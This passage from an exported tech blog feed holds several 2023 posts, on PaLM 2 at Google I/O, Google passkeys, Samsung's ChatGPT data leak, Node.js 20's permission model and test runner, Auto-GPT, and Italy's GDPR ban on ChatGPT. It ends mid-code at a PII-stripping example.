\u0026ldquo;Magic Editor\u0026rdquo; powered by generative AI. Google Maps gets \u0026ldquo;Immersive View\u0026rdquo; routes using AI and Street View data.\nFor developers, this means the Google Cloud Platform is making a very aggressive play to be the default AI development platform. The combination of PaLM 2 API access, Vertex AI\u0026rsquo;s MLOps tooling, Duet AI for development assistance, and TPU v5e for training creates a full-stack AI development environment that directly competes with Azure OpenAI and AWS Bedrock.\nMy Take # I\u0026rsquo;ve been skeptical about Google\u0026rsquo;s ability to translate research excellence into product execution. They invented the Transformer architecture, after all, and then watched OpenAI run away with the market. But this I/O felt different. There\u0026rsquo;s an urgency that wasn\u0026rsquo;t there before, and the PaLM 2 technical improvements suggest the research teams are finally getting the product support they need.\nThe developer tooling play is smart. If Google can capture even a fraction of the developers currently building on OpenAI\u0026rsquo;s API by offering competitive models with better cloud integration, the economics could shift quickly. PaLM 2\u0026rsquo;s multi-size approach — especially Gecko for on-device inference — also addresses a real gap that OpenAI hasn\u0026rsquo;t filled yet.\nThat said, I\u0026rsquo;d temper expectations. Google announced a lot today, and historically they ship about 60% of what they announce at I/O. The proof will be in the execution over the coming months. For now, though, the AI race just got meaningfully more competitive, and that\u0026rsquo;s good for all of us building software.\n","date":"11 May 2023","externalUrl":null,"permalink":"/posts/230511-google-io-2023-palm2-ai-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google I/O 2023 puts AI front and center with PaLM 2, signaling a massive platform shift across Search, Workspace, and Cloud.","title":"Google I/O 2023 — PaLM 2 and the AI Platform Play","type":"posts"},{"content":"Yesterday, on World Password Day of all days, Google announced that passkeys are now available as a sign-in option for all Google Accounts. This isn\u0026rsquo;t a beta or a limited rollout — it\u0026rsquo;s 1.5 billion accounts gaining access to passwordless authentication built on the FIDO2/WebAuthn standard. After years of the security community talking about killing passwords, this feels like the moment it actually starts happening.\nWhat Passkeys Are (and Aren\u0026rsquo;t) # For those who haven\u0026rsquo;t been following the FIDO Alliance\u0026rsquo;s work, passkeys are cryptographic credentials that replace passwords entirely. When you create a passkey for a site, your device generates a public-private key pair. The public key goes to the server; the private key stays on your device, protected by your screen lock (fingerprint, face recognition, or PIN).\nAuthentication works via a challenge-response protocol: the server sends a challenge, your device signs it with the private key after biometric verification, and the server validates the signature against the stored public key. The private key never leaves your device. There\u0026rsquo;s nothing to phish, nothing to leak in a database breach, nothing to reuse across sites.\nPasskeys build on the WebAuthn standard that\u0026rsquo;s been in browsers since 2019, but with a critical addition: syncing. Unlike hardware security keys (YubiKeys and the like), passkeys sync across your devices via your platform\u0026rsquo;s cloud — iCloud Keychain for Apple devices, Google Password Manager for Android and Chrome, and eventually Windows Hello for Microsoft\u0026rsquo;s ecosystem. This solves the biggest usability problem with previous FIDO implementations: losing your authenticator no longer means losing access.\nWhy This Matters More Than Previous Attempts # We\u0026rsquo;ve been trying to kill passwords for as long as I\u0026rsquo;ve been in this industry. Smart cards in the 90s, client certificates, various biometric schemes, FIDO U2F keys — all technically superior to passwords, all failed to achieve mainstream adoption. So why should passkeys be different?\nDevice support is already here. Passkeys work today on iOS 16+, Android 9+, macOS Ventura, and Windows 10/11 with the latest browser versions. That covers the vast majority of consumer devices without requiring any additional hardware.\nThe UX is genuinely better. I\u0026rsquo;ve been using passkeys on a few services for the past few months, and the experience is markedly faster than passwords. No typing, no password manager lookup, no 2FA code. Touch your fingerprint sensor and you\u0026rsquo;re in. For the first time, the secure option is also the most convenient option — and that\u0026rsquo;s the only way security wins at scale.\nThe big platforms are aligned. Apple, Google, and Microsoft are all committed to passkeys through the FIDO Alliance. When these three companies agree on an authentication standard and ship it in their platforms, adoption follows. This isn\u0026rsquo;t a niche security vendor trying to push a proprietary solution — it\u0026rsquo;s the infrastructure layer making passwords obsolete.\nImplementation Considerations for Developers # If you\u0026rsquo;re building applications that handle user authentication, it\u0026rsquo;s time to start planning passkey support. Here\u0026rsquo;s what I\u0026rsquo;ve learned from early implementation work:\nThe WebAuthn API is well-designed but has nuances. The browser API for creating and using passkeys is navigator.credentials.create() and navigator.credentials.get(). The specification is solid, but you\u0026rsquo;ll want a server-side library to handle attestation and assertion validation. Libraries like SimpleWebAuthn (JavaScript) or py_webauthn (Python) abstract the complexity.\nYou\u0026rsquo;ll need a migration strategy. You can\u0026rsquo;t flip a switch and require passkeys — you need a period where both passwords and passkeys work. Design your auth flow to prompt users to create a passkey after successful password login, and gradually nudge them toward passkey-only over time.\nAccount recovery is the hard problem. What happens when a user loses all their devices? With passwords, you send a reset email. With passkeys, the platform sync should handle device loss in most cases, but you still need a recovery path. Google\u0026rsquo;s approach includes recovery through phone number, another signed-in device, or a hardware security key. Design your recovery flow before shipping passkeys.\nThink about enterprise scenarios. Managed devices, shared workstations, and compliance requirements add complexity. FIDO2 supports attestation that lets you verify the type of authenticator being used — important if your security policy requires specific hardware.\nThe Road Ahead # Google\u0026rsquo;s rollout is a massive catalyst, but we\u0026rsquo;re still early. The adoption curve will look something like this:\nNow: Major platforms offer passkey sign-in alongside passwords Next 12-18 months: More services adopt passkeys; password managers integrate passkey support 2-3 years: Password-optional accounts become common on major services 5+ years: Password-only sign-in starts disappearing from mainstream services The wildcard is the cross-platform story. Right now, syncing works within ecosystems (Apple-to-Apple, Google-to-Google), but cross-platform passkey management is still evolving. If I create a passkey on my iPhone, using it on a Windows PC requires scanning a QR code for a cross-device authentication flow. It works, but it\u0026rsquo;s not as seamless as staying within one ecosystem. I expect this to improve significantly as the standards mature.\nMy Take # I\u0026rsquo;ve been advocating for WebAuthn adoption since the spec was finalized, and Google\u0026rsquo;s move is the best news I\u0026rsquo;ve seen for authentication security in years. Passwords are a fundamentally broken paradigm — they\u0026rsquo;re the single biggest attack vector for account compromise, and no amount of complexity requirements or rotation policies fixes the underlying problem.\nPasskeys aren\u0026rsquo;t perfect. The reliance on platform vendors for key syncing introduces its own trust considerations. The cross-platform experience needs work. Enterprise deployment scenarios are still being figured out. But these are tractable engineering problems, not fundamental design flaws.\nIf you\u0026rsquo;re a developer, add WebAuthn support to your roadmap. If you\u0026rsquo;re a user, go to g.co/passkeys and set up a passkey for your Google Account today. The best way to build momentum for passwordless authentication is to use it.\nWe\u0026rsquo;ve been talking about killing passwords for 30 years. This time, I think we actually have the right technology, the right ecosystem support, and the right user experience to make it happen.\nThis post is part of my Security in Practice series, tracking real-world security developments that matter for working engineers.\n","date":"4 May 2023","externalUrl":null,"permalink":"/posts/230504-google-passkeys-passwords-future/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google enables passkey sign-in for all Google Accounts, marking the most significant push yet toward a passwordless future built on FIDO2 and WebAuthn.","title":"Google Rolls Out Passkeys — The Beginning of the End for Passwords","type":"posts"},{"content":"The news broke this week that Samsung semiconductor employees leaked confidential data through ChatGPT on at least three separate occasions within a span of just 20 days. Engineers pasted proprietary source code to get debugging help, shared internal meeting notes for summarization, and submitted semiconductor test data for analysis. Samsung has since restricted internal ChatGPT use and is reportedly developing its own in-house AI tool. This story encapsulates a problem that every organization using — or trying to prevent the use of — LLM services needs to confront head-on.\nWhat Actually Happened # According to Korean media outlet Economist Korea, the leaks occurred shortly after Samsung\u0026rsquo;s semiconductor division lifted an earlier ban on ChatGPT. Three incidents were reported:\nAn engineer pasted proprietary source code into ChatGPT to check for bugs Another employee submitted code related to semiconductor equipment to optimize it A third recorded an internal meeting, transcribed it, and fed it to ChatGPT for meeting minutes In each case, the employees were using ChatGPT as a productivity tool — the same way millions of developers and knowledge workers are using it right now. The problem is that anything submitted to ChatGPT through the standard interface can be used by OpenAI for model training, and there\u0026rsquo;s no mechanism to retrieve or delete that data after submission.\nSamsung\u0026rsquo;s response was swift: restrict ChatGPT usage to prompts under 1,024 bytes (effectively making it useless for code tasks), threaten disciplinary action for future violations, and accelerate development of an internal alternative.\nThe Systemic Problem # Samsung isn\u0026rsquo;t unique here. They\u0026rsquo;re just the first major company to have their internal AI mishap become public. I\u0026rsquo;d wager that similar incidents are happening at thousands of companies right now, most of them undetected.\nThe fundamental issue is a collision between two forces:\nDeveloper productivity gains are real. ChatGPT and similar tools genuinely make people more productive. The Samsung engineers weren\u0026rsquo;t being negligent for fun — they were trying to do their jobs better and faster. When you\u0026rsquo;re staring at a bug at 11 PM, the temptation to paste your code into the best debugging assistant ever created is enormous.\nData governance hasn\u0026rsquo;t caught up. Most organizations\u0026rsquo; data classification and handling policies were written for a world where the primary risks were email attachments and USB drives. They don\u0026rsquo;t account for a scenario where an employee can exfiltrate sensitive data with a browser tab and good intentions.\nThis creates a shadow IT problem of unprecedented scale. Even if your company has an official policy prohibiting ChatGPT use, how do you enforce it? The service runs in a browser. There\u0026rsquo;s no installable client to block. You can restrict the domain at the network level, but employees have phones. And if you\u0026rsquo;re too heavy-handed with restrictions, your engineers will just use it at home on their personal devices — with less oversight, not more.\nBuilding an Enterprise AI Policy That Works # Based on conversations I\u0026rsquo;ve been having with CISOs and engineering leaders, here\u0026rsquo;s what a pragmatic approach looks like:\nClassify your data explicitly. Engineers need to know, in concrete terms, what can and cannot be shared with external AI services. \u0026ldquo;Confidential data\u0026rdquo; is too vague. Define it: source code from repositories X, Y, Z — never. Internal documentation — never. Public API documentation — acceptable. Stack traces with identifiers stripped — acceptable with review.\nProvide sanctioned alternatives. Banning ChatGPT without providing an alternative is like banning Stack Overflow — people will find workarounds. The better approach is to offer approved tools with proper data handling. OpenAI\u0026rsquo;s API with the data usage opt-out, Azure OpenAI Service with enterprise data protection, or self-hosted models like those based on LLaMA are all viable options depending on your sensitivity requirements.\nImplement technical controls where possible. DLP (Data Loss Prevention) tools can be configured to flag or block submissions to known AI service domains. Browser extensions can intercept paste events on certain sites. These aren\u0026rsquo;t foolproof, but they add friction that reduces accidental exposure.\nTrain your people. The Samsung engineers likely had no idea their prompts could be used for training. A 30-minute security awareness session specifically about AI tool risks would have prevented all three incidents.\nThe Broader Implications # This incident is accelerating a trend I\u0026rsquo;ve been watching: the enterprise AI stack is going to look very different from the consumer AI stack. Companies with serious IP concerns — semiconductor, pharma, defense, finance — are going to demand:\nOn-premises or VPC-deployed models where data never leaves their infrastructure Contractual guarantees that prompt data isn\u0026rsquo;t used for training Audit trails showing what data was submitted and by whom Model isolation ensuring their fine-tuned models aren\u0026rsquo;t accessible to other customers OpenAI\u0026rsquo;s enterprise offerings, Azure OpenAI Service, and the emerging open-source model ecosystem are all responses to this demand. But we\u0026rsquo;re still in the early days of figuring out the right architecture and governance model.\nMy Take # I have sympathy for those Samsung engineers. They did what any curious, productivity-minded developer would do — they used the best tool available to solve their immediate problem. The failure isn\u0026rsquo;t individual; it\u0026rsquo;s organizational. If your security policy can be violated by a well-meaning employee using a browser, your policy is insufficient.\nThe answer isn\u0026rsquo;t to ban AI tools. That ship has sailed. The answer is to build infrastructure and policies that let your team use AI productively without putting your IP at risk. That means investing in self-hosted models, deploying enterprise-grade AI services with proper data handling, and treating AI governance as a first-class security concern — not an afterthought.\nEvery engineering leader should be asking right now: \u0026ldquo;If my team is using ChatGPT — and they probably are — what data have they already shared?\u0026rdquo; The answer might be uncomfortable, but it\u0026rsquo;s better to find out on your own terms than to read about it in the press.\nThis post is part of my Security in Practice series, exploring real-world security challenges in software engineering.\n","date":"27 April 2023","externalUrl":null,"permalink":"/posts/230427-samsung-chatgpt-data-leak/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Samsung employees accidentally leaked proprietary source code and meeting notes via ChatGPT, exposing the urgent need for enterprise AI usage policies.","title":"Samsung's ChatGPT Data Leak — A Wake-Up Call for Enterprise AI Governance","type":"posts"},{"content":"Node.js 20 was released on April 18, and as someone who\u0026rsquo;s been building on Node since the early days (version 0.10, if you\u0026rsquo;re keeping score), this release tells an interesting story about where the runtime is heading. There are no headline-grabbing features that\u0026rsquo;ll set Twitter on fire, but the additions reflect a platform that\u0026rsquo;s growing up in exactly the right ways.\nThe Permission Model: Finally # The feature I\u0026rsquo;m most excited about is the experimental permission model. Launched behind the --experimental-permission flag, it allows you to restrict what a Node.js process can access: file system reads and writes, child process spawning, and worker thread creation.\nnode --experimental-permission --allow-fs-read=/app/data --allow-fs-write=/app/logs app.js This is a significant security improvement. For years, one of the legitimate criticisms of Node.js (and npm in particular) has been the supply chain risk: a single malicious dependency can read your filesystem, spawn processes, or exfiltrate data. With the permission model, you can constrain what the runtime itself is allowed to do, adding a layer of defense-in-depth that doesn\u0026rsquo;t depend on trusting every transitive dependency.\nIt\u0026rsquo;s still experimental, and the granularity isn\u0026rsquo;t as fine as Deno\u0026rsquo;s permission system (which has had this from day one — credit where it\u0026rsquo;s due). But the fact that Node.js is adopting this pattern validates what Ryan Dahl identified as a design flaw in his famous \u0026ldquo;10 Things I Regret About Node.js\u0026rdquo; talk. Better late than never, and the Node team\u0026rsquo;s implementation benefits from learning what works in practice.\nTest Runner Goes Stable # The built-in test runner, introduced experimentally in Node.js 18, is now marked as stable. This is a bigger deal than it might seem. For years, the Node.js testing story has been \u0026ldquo;pick a framework\u0026rdquo; — Mocha, Jest, Vitest, Ava, Tap — each with its own configuration, assertion style, and ecosystem. Having a zero-dependency test runner built into the runtime reduces friction significantly, especially for smaller projects and libraries.\nimport { describe, it } from \u0026#39;node:test\u0026#39;; import assert from \u0026#39;node:assert/strict\u0026#39;; describe(\u0026#39;Array\u0026#39;, () =\u0026gt; { it(\u0026#39;should return -1 when value is not present\u0026#39;, () =\u0026gt; { assert.equal([1, 2, 3].indexOf(4), -1); }); }); The API is clean and familiar. It supports describe/it blocks, beforeEach/afterEach hooks, subtests, mocking, code coverage via --experimental-test-coverage, and watch mode. It\u0026rsquo;s not going to replace Jest for complex frontend testing setups anytime soon, but for backend services and libraries, it\u0026rsquo;s increasingly compelling.\nI\u0026rsquo;ve started using it on a few internal tools, and the startup time alone — no Jest configuration parsing, no Babel transforms — makes it noticeably faster for small test suites.\nV8 11.3 and Performance # Node.js 20 ships with V8 11.3, which brings several quality-of-life improvements:\nString.prototype.isWellFormed() and toWellFormed() — Useful for handling strings that might contain lone surrogates, a common source of subtle bugs in text processing. Array.prototype changes — Methods like Array.fromAsync continue to modernize the standard library. Improved regular expression performance — V8\u0026rsquo;s regex engine continues to get faster, which matters for any application doing significant text parsing. The V8 update also brings Maglev, V8\u0026rsquo;s new mid-tier optimizing compiler, which sits between Sparkplug (the baseline compiler) and TurboFan (the full optimizing compiler). The practical impact is faster startup times and improved performance for code that runs moderately often — not hot enough for TurboFan to kick in, but frequent enough to benefit from optimization beyond the baseline.\nThe Bigger Picture: Node.js in 2023 # Stepping back, Node.js 20 reflects a runtime that\u0026rsquo;s shifted from \u0026ldquo;move fast and add features\u0026rdquo; to \u0026ldquo;mature, harden, and refine.\u0026rdquo; The permission model addresses security. The stable test runner reduces external dependencies. Performance improvements are incremental but consistent.\nThis is exactly what I want from a platform I\u0026rsquo;m running in production. The days of major breaking changes and the drama around --harmony flags feel like ancient history. Node.js has become the kind of boring, reliable infrastructure that you build businesses on — and I mean \u0026ldquo;boring\u0026rdquo; as the highest compliment.\nThe LTS schedule continues to be one of the best things about Node.js governance. Version 20 will enter Active LTS in October 2023, and teams can plan their upgrade paths with confidence. After the chaos of the early npm years, this kind of predictability is valuable.\nWhat I\u0026rsquo;m Watching # Two things I\u0026rsquo;ll be monitoring as Node.js 20 matures:\nPermission model adoption — Will the ecosystem embrace it? Will frameworks like Express or Fastify start documenting the permissions they need? This could become the foundation of a much stronger security story for Node.js.\nThe single-executable application feature — Also experimental in v20, the ability to bundle a Node.js app into a single executable (using the --experimental-sea-config flag) could change how we distribute Node.js tools. Think of it as Node\u0026rsquo;s answer to Go\u0026rsquo;s static binaries.\nMy Take # Node.js 20 isn\u0026rsquo;t exciting in the way that async/await in Node 8 was exciting. It\u0026rsquo;s exciting in the way that a well-maintained codebase is exciting — everything works a little better, the rough edges are getting smoothed out, and the platform is clearly being stewarded by people who care about the long-term.\nIf you\u0026rsquo;re starting a new Node.js project today, target version 20. If you\u0026rsquo;re on Node 18 LTS, plan your upgrade for when 20 hits LTS in October. And if you\u0026rsquo;re still on Node 16 — its end-of-life is September 2023, so start planning now.\nThe JavaScript runtime landscape has never been more competitive, with Deno and Bun both pushing interesting ideas. But Node.js remains the pragmatic choice for production workloads, and releases like this show why.\nThis post is part of my Developer Landscape series, covering the tools and platforms that shape how we build software.\n","date":"20 April 2023","externalUrl":null,"permalink":"/posts/230420-nodejs-20-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js 20 arrives with an experimental permission model, a stable test runner, and continued signs that the runtime is prioritizing security and developer experience over flashy features.","title":"Node.js 20 Drops — Permission Model, Test Runner, and the Maturity Arc","type":"posts"},{"content":"If you\u0026rsquo;ve been anywhere near tech Twitter or Hacker News this past week, you\u0026rsquo;ve seen Auto-GPT. The project rocketed from obscurity to over 50,000 GitHub stars in a matter of days, becoming one of the fastest-growing repositories in the platform\u0026rsquo;s history. The premise is intoxicating: give GPT-4 the ability to chain its own prompts, browse the web, execute code, and manage files — essentially letting it operate autonomously toward a goal you define. This arrives just weeks after the ChatGPT API had democratized access to GPT capabilities and GPT-4 had proven its reasoning capabilities. But having spent the last few days experimenting with it, I think we need to separate the genuine breakthrough from the considerable hype.\nWhat Auto-GPT Actually Does # At its core, Auto-GPT is an orchestration layer around GPT-4 (or GPT-3.5-turbo). It implements a loop: the model receives a goal, breaks it into sub-tasks, executes them using various \u0026ldquo;abilities\u0026rdquo; (web search, file I/O, code execution), evaluates the results, and decides on next steps. It maintains both short-term and long-term memory using vector databases like Pinecone.\nThe architecture is conceptually simple:\nTask decomposition — The model generates a plan Action selection — It picks from available tools Execution — The selected action runs Reflection — The model evaluates results and adjusts Loop — Repeat until the goal is achieved or budget exhausted This is essentially the ReAct (Reasoning + Acting) pattern from the Yao et al. paper, now accessible to anyone with an OpenAI API key and a Python environment.\nThe Reality Check # Here\u0026rsquo;s what I\u0026rsquo;ve found after running Auto-GPT on several real tasks: it\u0026rsquo;s fascinating but deeply unreliable. A few observations from my experiments:\nToken costs spiral quickly. Each iteration of the reasoning loop consumes tokens. A moderately complex task can burn through $10-20 in API calls before producing anything useful. The model frequently gets stuck in loops, rephrasing the same query or revisiting failed approaches.\nHallucination compounds. When a human uses ChatGPT, they can catch hallucinations in real-time. When Auto-GPT uses GPT-4, hallucinated facts from step 3 become the foundation for step 4, which informs step 5. Errors don\u0026rsquo;t just persist — they amplify.\nLong-term memory is brittle. The vector database approach to memory works for retrieval, but the model struggles to maintain coherent state across many iterations. After 20-30 loops, it often loses track of what it\u0026rsquo;s already tried or accomplished.\nIt works best on well-structured tasks. Asking it to research a topic and write a summary? Decent results. Asking it to build a complete application? It\u0026rsquo;ll generate plausible-looking code that rarely runs correctly without significant human intervention.\nWhy It Matters Anyway # Despite these limitations, I think Auto-GPT represents something genuinely important: the first mainstream demonstration that LLMs can be more than conversation partners. The idea that a language model can be an agent — taking actions in the world, not just generating text — is a paradigm shift that\u0026rsquo;s going to reshape how we think about software architecture.\nConsider what\u0026rsquo;s happening in this space right now:\nLangChain is building a framework for chaining LLM calls with tool use BabyAGI takes a simpler approach to task-driven autonomous agents Microsoft\u0026rsquo;s JARVIS/HuggingGPT connects ChatGPT to specialized models on Hugging Face We\u0026rsquo;re watching the emergence of a new software pattern: the AI agent loop. And like any new pattern, the early implementations are rough, but the underlying idea has legs.\nWhat This Means for Our Craft # As a developer who\u0026rsquo;s been building software for three decades, I see autonomous agents as the next step in a long evolution of abstraction. We went from assembly to high-level languages, from manual deployment to CI/CD, from hand-written queries to ORMs. Each step traded fine-grained control for productivity. AI agents are the next trade-off on that spectrum. The broader agent-based systems emerging from this work show how far this concept has evolved.\nBut I want to be measured about this. The path from \u0026ldquo;impressive demo\u0026rdquo; to \u0026ldquo;production-ready tool\u0026rdquo; is long. Remember when chatbots were going to replace all customer service? When blockchain was going to decentralize everything? The underlying technology in each case was real, but the timeline and scope of transformation was wildly overestimated.\nWhat I expect to see in the near term is not fully autonomous agents replacing developers, but semi-autonomous agents augmenting specific workflows: automated code review, intelligent test generation, documentation maintenance, incident response triage. Tasks where the cost of occasional errors is low and human oversight remains in the loop.\nMy Take # Auto-GPT is the proof-of-concept that launched a thousand forks. It\u0026rsquo;s not production-ready, and anyone deploying it on critical tasks today is going to have a bad time. But it\u0026rsquo;s an incredibly important experiment because it demonstrates the architecture pattern clearly enough for the entire developer community to start iterating on it.\nThe projects that will matter aren\u0026rsquo;t Auto-GPT itself, but the frameworks, guardrails, and patterns that emerge from this explosion of interest. How do we build reliable agent loops? How do we implement proper error boundaries? How do we manage costs and prevent runaway API usage? These are engineering problems, and they\u0026rsquo;re solvable.\nI\u0026rsquo;m excited, but I\u0026rsquo;m keeping my expectations calibrated. The most impactful AI tools in my daily work are still the simpler ones — Copilot for code completion, ChatGPT for brainstorming and debugging. The autonomous future is coming, but it\u0026rsquo;s coming incrementally, not overnight.\nThis post is part of my AI in Development series, tracking how artificial intelligence is changing the way we build software.\n","date":"13 April 2023","externalUrl":null,"permalink":"/posts/230413-auto-gpt-autonomous-agents/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Auto-GPT has taken GitHub by storm, promising fully autonomous AI agents. Here’s what’s real, what’s hype, and what it means for developers.","title":"Auto-GPT and the Autonomous Agent Explosion","type":"posts"},{"content":"Last week, Italy\u0026rsquo;s data protection authority — the Garante per la Protezione dei Dati Personali — blocked ChatGPT from operating in the country, making it the first Western nation to ban the service. The immediate trigger was concerns about GDPR compliance: the lack of age verification, the absence of a legal basis for mass data collection used in training, and the potential for inaccurate personal information generation. I wrote about this initial action last week, and now we\u0026rsquo;re seeing the deeper implications unfold. As someone who\u0026rsquo;s been working with European data regulations for years, I find this both entirely predictable and deeply significant.\nThe Garante\u0026rsquo;s Case # The Italian regulator\u0026rsquo;s complaints aren\u0026rsquo;t frivolous. They raised four specific concerns that any privacy-focused engineer should take seriously:\nNo age verification — ChatGPT has no mechanism to prevent minors under 13 from accessing the service, a clear GDPR requirement when processing children\u0026rsquo;s data. No legal basis for training data — OpenAI scraped massive amounts of internet data, including personal information of EU citizens, without explicit consent or a clearly articulated legitimate interest. Inaccurate personal data — The model can and does generate factually incorrect information about real people, with no mechanism for correction or deletion. No transparency — Users weren\u0026rsquo;t adequately informed about how their data would be processed. OpenAI was given 20 days to respond with remediation measures or face fines of up to €20 million or 4% of global annual turnover. That\u0026rsquo;s the standard GDPR penalty framework, but applied to an AI service for arguably the first time at this scale.\nThe Technical Challenge of GDPR Compliance for LLMs # Here\u0026rsquo;s where it gets genuinely interesting from an engineering perspective. GDPR enshrines the \u0026ldquo;right to be forgotten\u0026rdquo; — Article 17 requires data controllers to erase personal data upon request. But how do you erase someone\u0026rsquo;s data from a large language model that has been trained on it?\nYou can\u0026rsquo;t simply delete a row from a database. The information is encoded across billions of parameters in ways that aren\u0026rsquo;t directly addressable. Fine-tuning to \u0026ldquo;unlearn\u0026rdquo; specific data is an active research area, but it\u0026rsquo;s far from production-ready. The practical options today are:\nRetraining from scratch without the offending data — prohibitively expensive for models of GPT-4\u0026rsquo;s scale. Output filtering — preventing the model from surfacing specific personal data, which is a band-aid rather than true erasure. Differential privacy techniques applied during training — useful prospectively, but doesn\u0026rsquo;t help with models already trained. This is a fundamental architectural tension. The way we build foundation models today is essentially incompatible with individual data subject rights as GDPR defines them. I\u0026rsquo;ve been saying for years that privacy-by-design needs to be more than a checkbox, and LLMs are about to stress-test that principle like nothing before.\nThe Domino Effect # Other European regulators are watching closely. France\u0026rsquo;s CNIL, Germany\u0026rsquo;s federal data protection commissioner, and Ireland\u0026rsquo;s DPC (which oversees many US tech companies\u0026rsquo; EU operations) have all signaled interest. The European Data Protection Board has established a task force specifically to coordinate enforcement approaches to ChatGPT across member states.\nThis isn\u0026rsquo;t going to stop at ChatGPT, either. Every company building or deploying large language models that touch EU citizen data needs to be thinking about this right now. Google\u0026rsquo;s Bard, Anthropic\u0026rsquo;s Claude, Meta\u0026rsquo;s LLaMA derivatives — they\u0026rsquo;ll all face the same scrutiny. The broader regulatory framework the EU AI Act is establishing will formalize many of these tensions into concrete compliance requirements.\nFor those of us building applications on top of these models, the compliance question cascades. If I build a customer-facing tool using the OpenAI API, am I a data controller or processor? What\u0026rsquo;s my obligation when a user asks me to delete their conversation data, knowing it may have been used for model improvement? These are questions my legal and engineering teams are actively wrestling with.\nMy Take # I\u0026rsquo;ve lived through enough regulatory waves — from the original EU Data Protection Directive in 1995 to GDPR\u0026rsquo;s enforcement in 2018 — to know that the industry\u0026rsquo;s initial reaction of \u0026ldquo;this is overreach\u0026rdquo; usually gives way to \u0026ldquo;actually, this pushed us to build better systems.\u0026rdquo; I expect the same pattern here.\nItaly\u0026rsquo;s ban feels blunt, but the underlying concerns are legitimate. OpenAI moved fast and didn\u0026rsquo;t fully account for regional regulatory requirements — a familiar story in tech. The 20-day remediation window suggests the Garante wants compliance, not a permanent ban.\nWhat I hope comes out of this is a serious technical conversation about privacy-preserving AI architectures. We need better tooling for data provenance in training sets, practical unlearning mechanisms, and clearer consent frameworks that work at the scale of modern AI. The companies that figure this out first will have a genuine competitive advantage in the European market — and probably globally, as other jurisdictions follow suit.\nThe era of \u0026ldquo;move fast and train on everything\u0026rdquo; is hitting a wall. As engineers, we need to start designing for data rights from the ground up, not bolting them on after regulators come knocking.\nThis post is part of my ongoing Security in Practice series, exploring the intersection of security, privacy, and real-world software engineering.\n","date":"6 April 2023","externalUrl":null,"permalink":"/posts/230406-italy-chatgpt-ban-gdpr/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Italy’s data protection authority blocks ChatGPT over GDPR concerns, setting a precedent for how AI services will navigate European privacy law.","title":"Italy Bans ChatGPT — When Privacy Regulators Meet AI","type":"posts"},{"content":"Italy just became the first Western country to ban ChatGPT. The Italian data protection authority, the Garante per la protezione dei dati personali, issued an immediate temporary restriction on OpenAI\u0026rsquo;s processing of Italian users\u0026rsquo; data, effectively blocking the service in the country. The reasons cited are serious: no legal basis for the massive data collection used to train the models, no age verification mechanism, and inaccurate information generated about individuals. This action comes just months after the ChatGPT API had been released and was driving mainstream adoption of AI tools.\nWhether you think this is regulatory overreach or necessary consumer protection, one thing is clear: the collision between AI systems and privacy law is no longer theoretical. And if you\u0026rsquo;re building applications on top of AI APIs, you need to understand what this means.\nThe Garante\u0026rsquo;s Specific Complaints # The Italian authority raised four distinct issues, and each one has implications beyond Italy:\n1. No legal basis for data processing. GDPR requires a lawful basis for processing personal data. OpenAI doesn\u0026rsquo;t have explicit consent from the individuals whose data was used to train ChatGPT, and the Garante isn\u0026rsquo;t convinced that \u0026ldquo;legitimate interest\u0026rdquo; — the catch-all basis many companies rely on — applies to scraping the internet to train an AI model.\n2. No age verification. ChatGPT\u0026rsquo;s terms of service require users to be 13+, but there\u0026rsquo;s no mechanism to enforce this. Under GDPR, services directed at children (or that don\u0026rsquo;t prevent children from accessing them) face stricter requirements. The Garante argues that ChatGPT\u0026rsquo;s lack of age gates violates these provisions.\n3. Inaccurate personal data. ChatGPT generates text that can include factually incorrect information about real people. Under GDPR, individuals have the right to rectification of inaccurate personal data. But how do you \u0026ldquo;rectify\u0026rdquo; a language model? You can\u0026rsquo;t simply edit a database record — the misinformation is embedded in model weights trained on billions of parameters.\n4. No transparency about data collection. Users weren\u0026rsquo;t adequately informed about how their data (including conversations with ChatGPT) would be processed, retained, and potentially used for further training.\nWhy This Matters Beyond Italy # If you\u0026rsquo;re outside Italy and thinking \u0026ldquo;not my problem,\u0026rdquo; consider this: the GDPR applies across the entire European Economic Area. Italy moved first, but the concerns the Garante raised are not Italy-specific. France\u0026rsquo;s CNIL, Ireland\u0026rsquo;s DPC, and Germany\u0026rsquo;s data protection authorities have all been asking similar questions. The European Data Protection Board could coordinate a unified response.\nMore broadly, this exposes a fundamental tension in how large language models work. The GDPR was designed for a world where data processing is relatively transparent and bounded — a company collects specific data, uses it for stated purposes, and allows individuals to access, correct, or delete their data. LLMs don\u0026rsquo;t fit this model. The broader challenge of regulating AI development has become urgent as capabilities expand rapidly.\nTraining data: Scraped from the open internet, likely containing personal data from millions of people who never consented to this use. Model outputs: Can generate false statements about real individuals, with no clear mechanism for correction. User inputs: Conversations with AI services may be retained and used for further training, creating a secondary data processing concern. There\u0026rsquo;s no easy technical fix for any of these. You can\u0026rsquo;t \u0026ldquo;delete\u0026rdquo; someone from a trained model without retraining it. You can\u0026rsquo;t prevent a probabilistic text generator from occasionally producing inaccurate statements about individuals. And the scale of internet scraping required to train these models makes individual consent impractical.\nWhat This Means for Developers Building with AI # If you\u0026rsquo;re integrating OpenAI\u0026rsquo;s API (or any LLM) into applications that serve European users, here\u0026rsquo;s what you should be thinking about right now:\nData processing agreements: Make sure your DPA with OpenAI (or your AI provider) covers your GDPR obligations. If you\u0026rsquo;re sending user data to the API, you\u0026rsquo;re a data controller, and the AI provider is a data processor. The contractual chain needs to be solid.\nPrivacy notices: Your privacy policy needs to explicitly state that user inputs may be processed by a third-party AI service. Be specific about what data is sent, how it\u0026rsquo;s used, and whether it\u0026rsquo;s retained. Vague references to \u0026ldquo;AI-powered features\u0026rdquo; won\u0026rsquo;t cut it.\nData minimization: Don\u0026rsquo;t send more data to the AI API than you need. If you\u0026rsquo;re building a customer support bot, strip out personally identifiable information before sending the conversation context to the model. This isn\u0026rsquo;t just good privacy practice — it\u0026rsquo;s a GDPR requirement.\nRight to erasure: If a user invokes their GDPR right to deletion, you need to be able to delete their interactions with the AI service. Make sure you\u0026rsquo;re logging what you send and have the ability to request deletion from your AI provider.\nOpt-out mechanisms: Consider giving users the choice to use your service without AI features. This may be legally required in some jurisdictions and is certainly good practice from a trust perspective.\n# Example: Strip PII before sending to AI API def 